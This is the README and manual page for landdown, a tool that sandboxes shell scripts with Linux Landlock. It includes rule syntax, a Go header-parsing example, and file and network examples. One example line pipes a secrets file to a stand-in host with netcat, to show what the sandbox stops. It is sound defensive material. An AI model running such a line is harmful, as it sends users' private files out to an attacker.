landdown

Simple Sandboxing for shell scripts.

git clone git://mccd.space/landdown

README (2427B)

landdown(1)                 General Commands Manual                landdown(1)

NAME
       Landdown - Simple shell script sandbox

DESCRIPTION
       Landdown is an easy-to-use utility for Linux that allows you to sandbox
       shell scripts with Landlock. Just like Landlock, Landdown "aims to
       protect you against the security impacts of bugs or
       unexpected/malicious behavior". To use, prepend your script with the
       landdown shebang and a ruleset, and then write your shell script like
       you would normally. For example:

       #!/usr/bin/env landdown
       ro /bin
       ro /lib
       #!/bin/sh
       # Following works
       echo "Hi"
       # Following fails
       cat $HOME/my-secrets | nc exploit.com 1337

       Landdown locks down file and network access of a script based on rules
       explicitly listed in the allowlist.

SUPPORTED RULES
       rof <file>
       rwf <file>
       ro <dir>
       rw <dir>
       bind <port>
       connect <port>

       Each rule can be used zero or more times.

       The syntax is

       #!/usr/bin/env landdown
       <rules...>
       #!<interpreter>
       <script content...>

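The header syntax above, parsed and validated in Go as an added example; this is not landdown's own parser. `Rule`, `ParseHeader` and `sample` are hypothetical names, and the code assumes exactly one `<rule> <argument>` pair per line with no whitespace in paths.

```go
package main

import (
	"bufio"
	"fmt"
	"strconv"
	"strings"
)

// Rule is one allowlist entry, e.g. {"ro", "/bin"} or {"connect", "443"}.
type Rule struct{ Kind, Arg string }

// sample is constructed from the README's network-access example.
const sample = "#!/usr/bin/env landdown\nro /bin\nro /lib\nro /etc/ssl\n" +
	"rof /etc/resolv.conf\nconnect 443\n#!/bin/bash\ncurl https://www.google.com\n"

// ParseHeader returns the rules and the interpreter named by the second shebang.
// Assumption: one "<rule> <argument>" pair per line, no whitespace in paths.
func ParseHeader(script string) ([]Rule, string, error) {
	sc := bufio.NewScanner(strings.NewReader(script))
	if !sc.Scan() || !strings.HasPrefix(sc.Text(), "#!") || !strings.Contains(sc.Text(), "landdown") {
		return nil, "", fmt.Errorf("line 1: missing landdown shebang")
	}
	var rules []Rule
	for n := 2; sc.Scan(); n++ {
		line := strings.TrimSpace(sc.Text())
		if strings.HasPrefix(line, "#!") { // interpreter shebang ends the ruleset
			return rules, strings.TrimSpace(line[2:]), nil
		}
		f := strings.Fields(line)
		if len(f) != 2 {
			return nil, "", fmt.Errorf("line %d: want \"<rule> <argument>\"", n)
		}
		switch f[0] {
		case "rof", "rwf", "ro", "rw": // file and directory rules take a path
		case "bind", "connect": // network rules take a port number
			if _, err := strconv.ParseUint(f[1], 10, 16); err != nil {
				return nil, "", fmt.Errorf("line %d: bad port %q", n, f[1])
			}
		default:
			return nil, "", fmt.Errorf("line %d: unknown rule %q", n, f[0])
		}
		rules = append(rules, Rule{f[0], f[1]})
	}
	return nil, "", fmt.Errorf("no interpreter shebang after the rules")
}

func main() { fmt.Println(ParseHeader(sample)) }
```

A misspelled rule name or a script that never reaches the `#!<interpreter>` line is reported as an error rather than being treated as script content.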

INSTALL
       go install git.sr.ht/~marcc/landdown@latest

       Arch Linux <https://aur.archlinux.org/packages/landdown-git>

EXAMPLES
   Access a file
       Write the following script:

       #!/usr/bin/env landdown
       ro /bin
       ro /lib
       rwf /tmp/some-file.txt
       #!/bin/sh
       echo "Edit" > /tmp/some-file.txt

       Try removing rwf /tmp/some-file.txt and the script should fail.

       Note: the file needs to exist in order for landdown to work; run touch
       /tmp/some-file.txt to test.

   Network access
       Write the following script:

       #!/usr/bin/env landdown
       ro /bin
       ro /lib
       ro /etc/ssl
       rof /etc/resolv.conf
       connect 443
       #!/bin/bash
       curl https://www.google.com

       Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it
       should fail. Network access needs to be explicitly set.

CONTRIBUTIONS
       Contributions are welcome. Please send them to my public inbox
       <~marcc/public-inbox@lists.sr.ht>

SEE ALSO
       sh(1) - section on ulimit

       Good Practices
       <https://docs.kernel.org/userspace-api/landlock.html#good-practices>

   Alternatives
       bubblewrap(1) firejail(1) landrun(1)

                                  2026-06-30                       landdown(1)